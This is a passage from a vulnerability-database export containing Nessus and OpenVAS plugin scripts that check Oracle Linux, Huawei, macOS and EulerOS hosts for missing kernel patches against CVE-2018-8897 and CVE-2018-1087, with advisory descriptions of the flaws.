"bulletinFamily": "scanner", "cvelist": ["CVE-2018-1087", "CVE-2018-8897"], "modified": "2020-09-02T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2018-4096.NASL", "href": "https://www.tenable.com/plugins/nessus/109630", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2018-4096.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109630);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/09/27 13:00:39\");\n\n script_cve_id(\"CVE-2018-1087\", \"CVE-2018-8897\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2018-4096)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[4.1.12-124.14.5.el7uek]\n- vhost/scsi: fix reuse of vq->iov[out] in response (Benjamin \nCoddington) [Orabug: 27928330]\n\n[4.1.12-124.14.4.el7uek]\n- kernel.spec: add requires system-release for OL7 (Brian Maly) \n[Orabug: 27955380]\n- x86/kernel/traps.c: fix trace_die_notifier return value (Kris Van \nHees) {CVE-2018-8897}\n- x86/entry/64: Dont use IST entry for #BP stack (Andy Lutomirski) \n{CVE-2018-8897}\n- kvm/x86: fix icebp instruction handling (<A HREF='https://oss.oracle.com/mailman/listinfo/el-errata'>gregkh at linuxfoundation.org</A>) \n{CVE-2018-1087}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-May/007673.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-May/007674.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-1087\", \"CVE-2018-8897\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2018-4096\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"4.1\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-124.14.5.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-124.14.5.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-124.14.5.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-124.14.5.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-124.14.5.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-124.14.5.el6uek\")) flag++;\n\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-124.14.5.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-124.14.5.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-124.14.5.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-124.14.5.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-124.14.5.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-124.14.5.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-09T17:48:39", "description": "A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer", "edition": 5, "published": "2020-05-26T00:00:00", "title": "Huawei Data Communication: Privilege Escalation Vulnerability in Some Huawei Products (huawei-sa-20181010-01-debug)", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8897"], "modified": "2020-06-05T00:00:00", "id": "OPENVAS:1361412562310107835", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107835", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107835\");\n script_version(\"2020-06-05T12:34:50+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-05 12:34:50 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-26 15:22:01 +0200 (Tue, 26 May 2020)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2018-8897\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Privilege Escalation Vulnerability in Some Huawei Products (huawei-sa-20181010-01-debug)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels.\");\n\n script_tag(name:\"insight\", value:\"A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, some Xen configurations, or FreeBSD, or a Linux kernel. Some of Huawei products also be affected for this vulnerability. An attacker may exploit this vulnerability to escalate their privileges. (Vulnerability ID: HWPSIRT-2018-05100)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2018-8897.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"An attacker may exploit this vulnerability to escalate their privileges.\");\n\n script_tag(name:\"affected\", value:\"EulerOS versions V200R002C10 V200R002C20 V200R003C00 V200R005C00\n\nFusionModule1000A versions V100R003C10\n\nFusionSphere OpenStack versions V100R005C00 V100R005C10 V100R006C00 V100R006C10 V100R006C30\n\nManageOne versions V100R003C00 V100R006C30\n\nOceanStor Backup Software versions V100R001C00 V100R002C00 V100R002C00SPC200 V200R001C00 V200R001C00SPC200\n\nSMC2.0 versions V100R003C10 V500R002C00\n\neSpace VCN3000 versions V100R002C00 V100R002C10 V100R002C20\n\niManager NetEco versions V600R007C00 V600R007C10 V600R007C11 V600R007C12 V600R007C20 V600R007C40\n\niManager NetEco 6000 versions V600R007C40 V600R007C60 V600R007C80 V600R007C90\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20181010-01-debug-en\");\n\n exit(0);\n}\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\ncpe_list = make_list( \"cpe:/o:huawei:_firmware\" ); #no known vulnerable devices\n\nif( ! infos = get_app_version_from_list( cpe_list:cpe_list, nofork:TRUE ) )\n exit( 0 );\n\ncpe = infos[\"cpe\"];\nversion = toupper( infos[\"version\"] );\n\npatch = get_kb_item( \"huawei/vrp/patch\" );\n\nif( cpe =~ \"^cpe:/o:huawei:_firmware\" ) {\n if( version == \"\" || version == \"\" || version == \"\" || version == \"\" ||\n version == \"\" ) {\n report = report_fixed_ver( installed_version:version, fixed_version:\"\" );\n security_message( port:0, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-03T19:45:30", "description": "This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.", "edition": 11, "published": "2018-06-04T00:00:00", "title": "Apple MacOSX Security Updates(HT208849)-03", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8897", "CVE-2018-4171"], "modified": "2020-02-28T00:00:00", "id": "OPENVAS:1361412562310813512", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813512", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple MacOSX Security Updates(HT208849)-03\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813512\");\n script_version(\"2020-02-28T13:41:47+0000\");\n script_cve_id(\"CVE-2018-8897\", \"CVE-2018-4171\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 13:41:47 +0000 (Fri, 28 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-04 14:09:18 +0530 (Mon, 04 Jun 2018)\");\n script_name(\"Apple MacOSX Security Updates(HT208849)-03\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - The operating system unable to properly handle an Intel architecture debug\n exception after certain instructions.\n\n - An information disclosure issue in device properties.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and determine kernel memory layout.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions,\n 10.11.x through 10.11.6, 10.12.x through 10.12.6.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X 10.11.6 build\n 15G21012 for 10.11.x versions or Apple Mac OS X 10.12 build 16G1408 for 10.12.x\n versions. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208849\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.1[12]\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.1[12]\" || \"Mac OS X\" >!< osName)\n exit(0);\n\nbuildVer = get_kb_item(\"ssh/login/osx_build\");\n\nif(osVer =~ \"^10\\.11\") {\n if(version_is_less(version:osVer, test_version:\"10.11.6\")){\n fix = \"Upgrade to latest OS(10.11.6) release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.11.6\" && version_is_less(version:buildVer, test_version:\"15G21012\")) {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n}\n\nif(osVer =~ \"^10\\.12\") {\n if(version_is_less(version:osVer, test_version:\"10.12.6\")){\n fix = \"Upgrade to latest OS(10.12.6) release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.12.6\" && version_is_less(version:buildVer, test_version:\"16G1408\")) {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n}\n\nif(fix) {\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:38:31", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "edition": 1, "published": "2020-01-23T00:00:00", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2018-1121)", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1087", "CVE-2018-8897"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181121", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181121", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1121\");\n script_version(\"2020-01-23T11:13:29+0000\");\n script_cve_id(\"CVE-2018-1087\", \"CVE-2018-8897\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:13:29 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:13:29 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2018-1121)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1121\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1121\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2018-1121 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A, section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A, section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL 3, the debug exception is delivered after the transfer to CPL 3 is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs.CVE-2018-8897)\n\nOn x86, MOV SS and POP SS behave strangely if they encounter a data breakpoint. If this occurs in a KVM guest, KVM incorrectly thinks that a #DB instruction was caused by the undocumented ICEBP instruction. This results in #DB being delivered to the guest kernel with an incorrect RIP on the stack. On most guest kernels, this will allow a guest user to DoS the guest kernel or even to escalate privilege to that of the guest kernel. (CVE-2018-1087)\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~514.44.5.10.h80\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~514.44.5.10.h80\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~514.44.5.10.h80\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~514.44.5.10.h80\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~514.44.5.10.h80\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~514.44.5.10.h80\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~514.44.5.10.h80\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~514.44.5.10.h80\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~514.44.5.10.h80\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:34:10", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "edition": 1, "published": "2020-01-23T00:00:00", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2018-1270)", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8897", "CVE-2018-3639"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181270", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181270", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1270\");\n script_version(\"2020-01-23T11:19:38+0000\");\n script_cve_id(\"CVE-2018-3639\", \"CVE-2018-8897\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:19:38 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:19:38 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2018-1270)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-2\\.5\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1270\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1270\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2018-1270 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks.(CVE-2018-3639)\n\nA statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a 